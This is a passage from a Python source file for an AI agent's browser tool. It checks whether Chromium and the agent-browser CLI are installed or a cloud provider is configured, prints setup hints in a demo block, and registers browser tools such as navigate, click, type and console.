       ``chrome``).
    3. Playwright's browser cache (current logic) — directories containing
       ``chromium-*`` or ``chromium_headless_shell-*``.

    agent-browser (0.26+) downloads Playwright's chromium / headless-shell
    builds into ``PLAYWRIGHT_BROWSERS_PATH`` and won't start without at least
    one of the three above being present. Without a browser binary the CLI
    hangs on first use until the command timeout fires (often ~30s). Guarding
    the tool behind this check prevents advertising a capability that will
    fail at runtime.

    The result is cached in ``_cached_chromium_installed`` until the module's
    caches are reset.
    """
    global _cached_chromium_installed
    if _cached_chromium_installed is not None:
        return _cached_chromium_installed

    # 1. AGENT_BROWSER_EXECUTABLE_PATH — explicit user-configured browser
    ab_path = os.environ.get("AGENT_BROWSER_EXECUTABLE_PATH", "").strip()
    if ab_path:
        # Accept either an absolute file path or a command name on PATH.
        # An invalid value falls through to the remaining checks.
        if os.path.isfile(ab_path) or shutil.which(ab_path):
            _cached_chromium_installed = True
            return True

    # 2. System Chrome/Chromium in PATH (common names)
    system_chrome = shutil.which("google-chrome") or shutil.which("chromium-browser") or shutil.which("chrome")
    if system_chrome:
        _cached_chromium_installed = True
        return True

    # 3. Playwright browser cache (legacy — chromium-* / chromium_headless_shell-* dirs)
    for root in _chromium_search_roots():
        if not root or not os.path.isdir(root):
            continue
        try:
            entries = os.listdir(root)
        except OSError:
            continue
        # Playwright names them ``chromium-<build>`` and
        # ``chromium_headless_shell-<build>``; agent-browser accepts either.
        for entry in entries:
            if entry.startswith("chromium-") or entry.startswith(
                "chromium_headless_shell-"
            ):
                _cached_chromium_installed = True
                return True

    _cached_chromium_installed = False
    return False


def _running_in_docker() -> bool:
    """Best-effort detection of whether we're inside a Docker container.

    NOTE(review): /proc/1/cgroup often lacks the "docker" marker on
    cgroup-v2 hosts, so this can under-detect — acceptable since it is only
    used to pick a friendlier install hint.
    """
    if os.path.exists("/.dockerenv"):
        return True
    try:
        with open("/proc/1/cgroup", "rt") as fp:
            return "docker" in fp.read()
    except OSError:
        return False


def check_browser_requirements() -> bool:
    """
    Check if browser tool requirements are met.

    In **local mode** (no cloud provider configured): the ``agent-browser``
    CLI must be findable *and* a Chromium build must be installed on disk.

    In **cloud mode** (Browserbase, Browser Use, or Firecrawl): the CLI
    and the provider's required credentials must be present. The cloud
    provider hosts its own Chromium, so no local browser binary is needed.

    Returns:
        True if all requirements are met, False otherwise
    """
    # Camofox backend — only needs the server URL, no agent-browser CLI
    if _is_camofox_mode():
        return True

    # CDP override mode can connect to an existing remote/local browser endpoint
    # without requiring the local agent-browser binary on PATH.
    if _get_cdp_override():
        return True

    # The agent-browser CLI is required for local launch and cloud-provider flows.
    try:
        browser_cmd = _find_agent_browser()
    except FileNotFoundError:
        return False

    # On Termux, the bare npx fallback is too fragile to treat as a satisfied
    # local browser dependency. Require a real install (global or local) so the
    # browser tool is not advertised as available when it will likely fail on
    # first use.
    if _requires_real_termux_browser_install(browser_cmd):
        return False

    # In cloud mode, also require provider credentials. Cloud browsers
    # don't need a local Chromium binary.
    provider = _get_cloud_provider()
    if provider is not None:
        return provider.is_configured()

    # Local mode: agent-browser needs a Chromium build on disk. Without it
    # the CLI hangs on first use until the command timeout fires.
    if not _chromium_installed():
        return False

    return True


# ============================================================================
# Module Test
# ============================================================================

if __name__ == "__main__":
    """
    Simple test/demo when run directly
    """
    print("🌐 Browser Tool Module")
    print("=" * 40)

    # Report which backend would be used (local vs a configured cloud provider).
    _cp = _get_cloud_provider()
    mode = "local" if _cp is None else f"cloud ({_cp.provider_name()})"
    print(f" Mode: {mode}")

    # Check requirements and, on failure, diagnose the most likely cause.
    if check_browser_requirements():
        print("✅ All requirements met")
    else:
        print("❌ Missing requirements:")
        try:
            browser_cmd = _find_agent_browser()
            if _requires_real_termux_browser_install(browser_cmd):
                print(" - bare npx fallback found (insufficient on Termux local mode)")
                print(f" Install: {_browser_install_hint()}")
            elif _cp is None and not _chromium_installed():
                print(" - Chromium browser binary not found")
                searched = ", ".join(_chromium_search_roots()) or "(no candidate paths)"
                print(f" Searched: {searched}")
                if _running_in_docker():
                    print(
                        " Docker: pull the latest image — the current one "
                        "predates the bundled Chromium install"
                    )
                    print(" docker pull ghcr.io/nousresearch/hermes-agent:latest")
                else:
                    print(" Install it with:")
                    print(" npx agent-browser install --with-deps")
                    print(" Or: npx playwright install --with-deps chromium")
        except FileNotFoundError:
            print(" - agent-browser CLI not found")
            print(f" Install: {_browser_install_hint()}")
        if _cp is not None and not _cp.is_configured():
            print(f" - {_cp.provider_name()} credentials not configured")
            print(" Tip: set browser.cloud_provider to 'local' to use free local mode instead")

    print("\n📋 Available Browser Tools:")
    for schema in BROWSER_TOOL_SCHEMAS:
        print(f" 🔹 {schema['name']}: {schema['description'][:60]}...")

    print("\n💡 Usage:")
    print(" from tools.browser_tool import browser_navigate, browser_snapshot")
    print(" result = browser_navigate('https://example.com', task_id='my_task')")
    print(" snapshot = browser_snapshot(task_id='my_task')")


# ---------------------------------------------------------------------------
# Registry
# ---------------------------------------------------------------------------
from tools.registry import registry, tool_error

# Index tool schemas by name for the registrations below.
_BROWSER_SCHEMA_MAP = {s["name"]: s for s in BROWSER_TOOL_SCHEMAS}

# Each handler adapts the registry's (args, **kwargs) calling convention to
# the tool function's keyword signature. check_fn gates whether the tool is
# advertised as available at all (see check_browser_requirements above).
registry.register(
    name="browser_navigate",
    toolset="browser",
    schema=_BROWSER_SCHEMA_MAP["browser_navigate"],
    handler=lambda args, **kw: browser_navigate(url=args.get("url", ""), task_id=kw.get("task_id")),
    check_fn=check_browser_requirements,
    emoji="🌐",
)
registry.register(
    name="browser_snapshot",
    toolset="browser",
    schema=_BROWSER_SCHEMA_MAP["browser_snapshot"],
    handler=lambda args, **kw: browser_snapshot(
        full=args.get("full", False), task_id=kw.get("task_id"), user_task=kw.get("user_task")),
    check_fn=check_browser_requirements,
    emoji="📸",
)
registry.register(
    name="browser_click",
    toolset="browser",
    schema=_BROWSER_SCHEMA_MAP["browser_click"],
    handler=lambda args, **kw: browser_click(ref=args.get("ref", ""), task_id=kw.get("task_id")),
    check_fn=check_browser_requirements,
    emoji="👆",
)
registry.register(
    name="browser_type",
    toolset="browser",
    schema=_BROWSER_SCHEMA_MAP["browser_type"],
    handler=lambda args, **kw: browser_type(ref=args.get("ref", ""), text=args.get("text", ""), task_id=kw.get("task_id")),
    check_fn=check_browser_requirements,
    emoji="⌨️",
)
registry.register(
    name="browser_scroll",
    toolset="browser",
    schema=_BROWSER_SCHEMA_MAP["browser_scroll"],
    handler=lambda args, **kw: browser_scroll(direction=args.get("direction", "down"), task_id=kw.get("task_id")),
    check_fn=check_browser_requirements,
    emoji="📜",
)
registry.register(
    name="browser_back",
    toolset="browser",
    schema=_BROWSER_SCHEMA_MAP["browser_back"],
    handler=lambda args, **kw: browser_back(task_id=kw.get("task_id")),
    check_fn=check_browser_requirements,
    emoji="◀️",
)
registry.register(
    name="browser_press",
    toolset="browser",
    schema=_BROWSER_SCHEMA_MAP["browser_press"],
    handler=lambda args, **kw: browser_press(key=args.get("key", ""), task_id=kw.get("task_id")),
    check_fn=check_browser_requirements,
    emoji="⌨️",
)

registry.register(
    name="browser_get_images",
    toolset="browser",
    schema=_BROWSER_SCHEMA_MAP["browser_get_images"],
    handler=lambda args, **kw: browser_get_images(task_id=kw.get("task_id")),
    check_fn=check_browser_requirements,
    emoji="🖼️",
)
registry.register(
    name="browser_vision",
    toolset="browser",
    schema=_BROWSER_SCHEMA_MAP["browser_vision"],
    handler=lambda args, **kw: browser_vision(question=args.get("question", ""), annotate=args.get("annotate", False), task_id=kw.get("task_id")),
    check_fn=check_browser_requirements,
    emoji="👁️",
)
registry.register(
    name="browser_console",
    toolset="browser",
    schema=_BROWSER_SCHEMA_MAP["browser_console"],
    handler=lambda args, **kw: browser_console(clear=args.get("clear", False), expression=args.get("expression"), task_id=kw.get("task_id")),
    check_fn=check_browser_requirements,
    emoji="🖥️",
)